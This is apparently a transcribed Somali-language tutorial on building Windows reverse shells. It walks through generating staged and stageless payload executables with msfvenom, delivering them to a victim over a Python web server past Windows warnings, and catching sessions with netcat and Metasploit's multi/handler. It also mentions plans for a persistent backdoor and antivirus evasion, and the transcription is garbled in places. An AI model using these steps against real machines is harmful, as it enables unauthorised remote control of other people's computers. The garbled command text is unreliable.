Asalaamu calaykum, soo dhawaada. Waxaan sameyneynaa reverse shell. Kadib reverse shellkaas waxaan ka dhigaynaa backdoor isagoo mar walbo systemka computerka rangareysmo uu ugu soo xirmo Linux machine-keena. Waxaan isticmaalaynaa, waxaa u baahan tahay Linux machine iyo Window machine. Windowgan hadda wuu ku xiran yahay, antivirus-ku wuu xiran yahay for education purposes only. Waxaa loo baahan yahay bis aniga waxaan u baahanaa kaliya inaan tijaabino, laakiin sidii antivirus-ka loo evade gareyn lahaa isagoo ku detect gareynin waa shaqo kale. Laakiin inta hadda waxaan sameyneynaa kaliya file executable ah oo reverse shell ah. Waxaan soo dhex dhigaynaa windowgan, kadibna oo execute gareyneynaa. Markaan execute gareyno wuxuuna siinayaa reverse shell oo remote connection oo inta windowgaas ayaan inta ka isticmaalaynaa anagoo joogno kaligeena. Marka waxaan u baahannahay, waxaan isticmaalaynaa horta tool la yiraahdo Amazon Venom oo noo sameynayo file executable ah oo window ah. Marka la sameynayo reverse shell laba qaab loo sameeyaa: stage mise stageless. Staged wuxuu qabanayaa koodii qayb yar ayuu marka hore dirayaa, kadibna wax ayuu soo dejinayaa. Stageless-ka wixii connection-kii buu hal mar wada dirayaa. Marka wuxuu u baahan yahay macnaha stage-ka in wax yariiskooda uu diro oo seeta camal u dhaho, kadib markii loo soo jawaabo uu kadib shell-kii soo qabto oo qofkii aa heshid connection-kiisii iyo wax command iyo aa isticmaali kartid computer kale ka isticmaali kartid meeshaan. Laakiin stageless-ka asiga kaama sugaya, hal mar buu wixiisa wada dirayaa, hal mar buu baakadkiisa wada dirayaa, kadibna connection-ka ayaa helaysaa. Marka koodii waxaan sameyneynaa stage. Waxaan leenahay MSF Venom /p Windows 64. waxaan leenahay meter printer, kadibna reverse isagaan hoos dhameystira waa kana reverse shell. Kadib waxaan dooranaynaa IP address-keena oo ah IP haddaan dhahno waa kana IP address-keena iyo portiga aan rabno connection inuu ka dhaco iyo format-ka oo ah .exe. Markaan .exe.2 baan ka dhigaynaa. Markaan run gareyno wuxuuna sameynayaa data tirnoo dhahno ls waa kaasaa filekeeni. Hadda filekeeni ayaan gudbinaynaa marka oo waxaan u diraynaa user. waxaan leenahay python 3 http://server.80. markaan run gareyno waxaan tagaynaa windowga, browser-ka ayaan furaynaa. restore ma rabno, waxaan gelinaynaa IP address-ka oo kaaligayo 172.168/. waa kana waxaan soo dejinaynaa marka reverse2.exe. keybit ayaan leenahay, windowga ayaa diidaya. waxaan tagaynaa dowladka, waxaan leenahay keybit. hadda wuu noo soo degay, meeshan ayuu noo yaalaa. marka waxaan isticmaalaynaa listener ayaan sameysanaynaa. listener oo ah markii user-ka uu ku dhufto filekaas inaan heli karno shell. marka koowaad waxaan isticmaalaynaa laba qaab. waxaan isticmaalaynaa netcat, waa isticmaali karnaa si aan listener u sameyno. waxaa kaloo isticmaali karnaa MSF console. haddii aan fiirino aan isku dayno koodii netcat-ka, nc aan leenahay, nc kadibna lvnb
kadibna boortigii aan siinay markaan sameyneynay waxaan dhahay aan sameyneynay fileka oo exe ah wuxuu ahaa 3444 kadibna waa run gareyneynaa maadaama fileka aan sameyn uu yahay stage netcad shal nama siinayso laakiin waxay noo sheegaysaa keliya in connection uu dhacay sababta ay noo siinayeen waxay tahay aniga waa hadda markaan run gareyno wuxuu leeyahay smart code wuxuu ku leeyahay run gareynin islamida maadaama antiviruska uu furan yahay more ayaan leenahay kadibna run anyway sidaa arkayso connectionka wuu dhacay laakiin wax shal ah ma haysano sababta maxay tahay sababtoo ah waxaan run gareynayno waxaa fileka waa staged ba staged markuu yahay oo netcad aan isticmaalayno netcadka protocolka oo ms venom iyo netcadka isma laha sidaas darteed stageka wuxuu sameynayaa koodii high ayuu leeyahay highdi markii uu dhaho markaas bis ayaa lasoo qabanaya kabacdi ayuu adan wax kala soo diraya koodii wuxuu soo diraya highda keliya kabacdi ayuu inuu shalkana sii warabaa sessionka laakiin ma haysano oo netcad masii qabanayso high kabacdi marka lala soo hadlay kabacdi protocolkaas ma laha marka waa istaajinaynaa kan waxaa isticmaalaynaa msf console ayaa isticmaalaynaa intaa listenerka isticmaalaynaa marka waxaa leenahay use exploit multi handler payloadki oo ah set payload windows x64 meter printer reverse tcb kaas payloadki markaa u sheegno isticmaalaya waxaan sameynaynaa set lportigoo isticmaalaya 3444 ayaan sheegaynaa waxaan leenahay set lhost ethernet 0 oo ah ip addresskeena kadibna waxaan leenahay run hadda wuxuu dhegeysanayaa connection ayuu dhegeysanayaa connection ka imaanayo portigaas iyo ip addresskaas u imaanayo started reverse handler listenerka wuu noo socdaa hadda haddaan run gareyno filekan executableka ah aan markale run gareyno haddaba u imaano waa kana we have a session waxaan leenahay oo keliya shell waa kana who am I kana userkeeni sysinfo oo lagama yaqaan maadaama PowerShell aan ku jirno exit aan leenahay waxaan soo leenahay sysinfo ayaan leenahay wuxuu sheegayaa windowgii architecturekiisa iyo haddii uu demoonku jiray haddii uu workgroup yahay marka waa ka wada bixinaa waxaan fiirinaynaa marka hadda stageless oo ku shaqeynayo si walba oo hal mar wax soo wada dirayo net waa cmd camal hal mar ayuu wax soo wada diraya waxaan isticmaalaynaa ms venom /p windows s64 inta ayaan waxaan leenahay shell waa kana intana waxaan leenahay maadaama kaaskan kale uu yahay magaca waxaan siinaynaa reverse shell iska dheh kadibna boortigii la hostigi oo ip addresskan ah boortigeeni iyo formatkii kan wuxuu noo sameynayaa hadda stageless oo ah filekaaga markii loo geeyo victimka uu ku dhufto hal mar ayaa loo wada geenayaa macnaha lama packageka hal mar ayaa loo wada dirayaa kadibna wuxuu ku dhufto shellka horaa ka helaysaa markaan sameyno
clear ayaan ls wuu noo sameysan yahay waa kana kadibna netcardka ayaan rangaraynayna hadda markii haddii aan waa inaan dhahnaa python maadaama hadda stageki uu inta yaalo stagelesska uu inta yaalo waa inaan u geynaa victimka waxaan rangaraynayna server inta usoo laabanaynaa markaasa inta tagayna waxaan leenahay keep it anyway do not the dangerous nolosha labaad gareeyay hadda markaan rangareyno waxaan leenahay running anyway and we have our shell shellkeena hadduu ahayn so who am I waa kaasaa userka waa ku jirnaa hadda so differencega keliya waxaa waaye in mid uu hal mar wada dirayo midna uu koodi wuxuu dirayaa keliya bytes yaris oo ah high oo kale isigoo hadalkii wada sheegin macnaha iyo sessionkii wax dhimaan soo wada dirin midna hal mar iyo wax walba soo wada diraya marka differencegaas bis ayuu kala duwan yihiin